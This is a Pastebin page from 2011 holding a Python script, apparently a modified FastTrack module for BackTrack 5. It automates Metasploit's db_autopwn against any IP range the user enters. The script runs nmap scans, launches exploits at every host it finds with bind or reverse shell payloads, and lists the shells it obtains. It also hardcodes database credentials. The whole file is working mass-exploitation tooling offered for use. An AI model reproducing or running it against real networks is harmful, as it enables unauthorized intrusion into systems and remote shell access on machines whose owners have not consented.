Pastebin launched a little side project called VERYVIRAL.com, check it out ;-) Want more features on Pastebin? Sign Up, it's FREE!
Guest

FastTrack Autopwn BT5

By: a guest on Aug 17th, 2011  |  syntax: Python  |  size: 3.26 KB  |  views: 577  |  expires: Never
download  |  raw  |  embed  |  report abuse  |  print
Text below is selected. Please press Ctrl+C to copy to your clipboard. (⌘+C on Mac)
  1. #!/usr/bin/env python
  2. # This ins not the official file from FastTrack I just made some changes to work with BT5: MaxFX aka Bl4ck5w4n
  3.  
  4. import pexpect
  5. import sys
  6. import os
  7. import time
  8. import re
  9.  
  10. definepath=os.getcwd()
  11. sys.path.append("%s/bin/ftsrc/" % (definepath))
  12. import include
  13.  
  14. try:
  15.    import psyco
  16.    psyco.full()
  17. except ImportError:
  18.    pass
  19.  
  20. try:
  21.    ipaddr=sys.argv[3]
  22. except IndexError:
  23.    include.print_banner()
  24.    ipaddr=raw_input("""
  25. Metasploit Autopwn Automation:
  26.  
  27.    http://www.metasploit.com
  28.  
  29.    This tool specifically piggy backs some commands from the Metasploit
  30.    Framework and does not modify the Metasploit Framework in any way. This
  31.    is simply to automate some tasks from the autopwn feature already developed
  32.    by the Metasploit crew.
  33.  
  34.    Simple, enter the IP ranges like you would in NMap i.e. 192.168.1.-254
  35.    or 192.168.1.1/24 or whatever you want and it'll run against those hosts.
  36.    Additionally you can place NMAP commands within the autopwn ip ranges bar,
  37.    for example, if you want to scan even if a host "appears down" just do
  38.    -PN 192.168.1.1-254 or whatever...you can use all NMap syntaxes in the
  39.    Autopwn IP Ranges portion.
  40.  
  41.    When it has completed exploiting simply type this:
  42.  
  43.    sessions -l (lists the shells spawned)
  44.    sessions -i <id> (jumps you into the sessions)
  45.  
  46.    Example 1: -PN 192.168.1.1
  47.    Example 2: 192.168.1.1-254
  48.    Example 3: -P0 -v -A 192.168.1.1
  49.    Example 4: 192.168.1.1/24
  50.  
  51.         Enter the IP ranges to autopwn or (q)uit FastTrack: """)
  52. if ipaddr == 'quit' or ipaddr == 'q':
  53.    print "\n\nExiting Fast-Track autopwn...\n\n"
  54.    sys.exit()
  55. # Spawn instance of msfconsole
  56. try:
  57.    option1=sys.argv[4]
  58. except IndexError:
  59.    option1=raw_input("""
  60.    Do you want to do a bind or reverse payload?
  61.  
  62.    Bind = direct connection to the server
  63.    Reverse = connection originates from server
  64.  
  65.    1. Bind
  66.    2. Reverse
  67.  
  68.    Enter number: """)
  69. if option1 == 'quit' or option1 == 'q':
  70.    print "\n\n    Exiting Fast-Track autopwn...\n\n"
  71.    sys.exit()
  72. if option1 == '1': option1='-b'
  73. if option1 == '2': option1='-r'
  74. print "    Launching MSFConsole and prepping autopwn..."
  75.  
  76. # define metasploit path
  77. #meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
  78. #for line in meta_path:
  79. #    line=line.rstrip()
  80. #    match=re.search("METASPLOIT_PATH",line)
  81. #    if match:
  82. #       line=line.replace("METASPLOIT_PATH=","")
  83. #       metapath=line
  84.  
  85.  
  86. try:
  87.    os.system("start mysql")
  88.    child1 = pexpect.spawn('msfconsole')
  89. # load sqlite3
  90.    child1.sendline ('db_driver mysql')
  91. # Destroy database
  92. #   child1.sendline ('db_destroy pentest')
  93. # Create database
  94.    child1.sendline ('db_connect root:toor@127.0.0.1/pentest')
  95. # run actual port scans
  96.    child1.sendline ('''db_nmap %s ''' % (ipaddr))
  97. # run actual exploitation
  98.    child1.sendline ('db_autopwn -p -t -e %s' % (option1))
  99.    child1.sendline ('sleep 5')
  100.    child1.sendline ('jobs -K')
  101.    child1.sendline ('\n\n\n')
  102.    child1.sendline ('sessions -l')
  103.    child1.sendline ('echo "If it states No sessions, then you were unsuccessful. Simply type sessions -i <id> to jump into a shell"')
  104. # jump to pid
  105.    child1.interact()
  106. except Exception:
  107.        print "\n    Exiting Fast-Track...\n"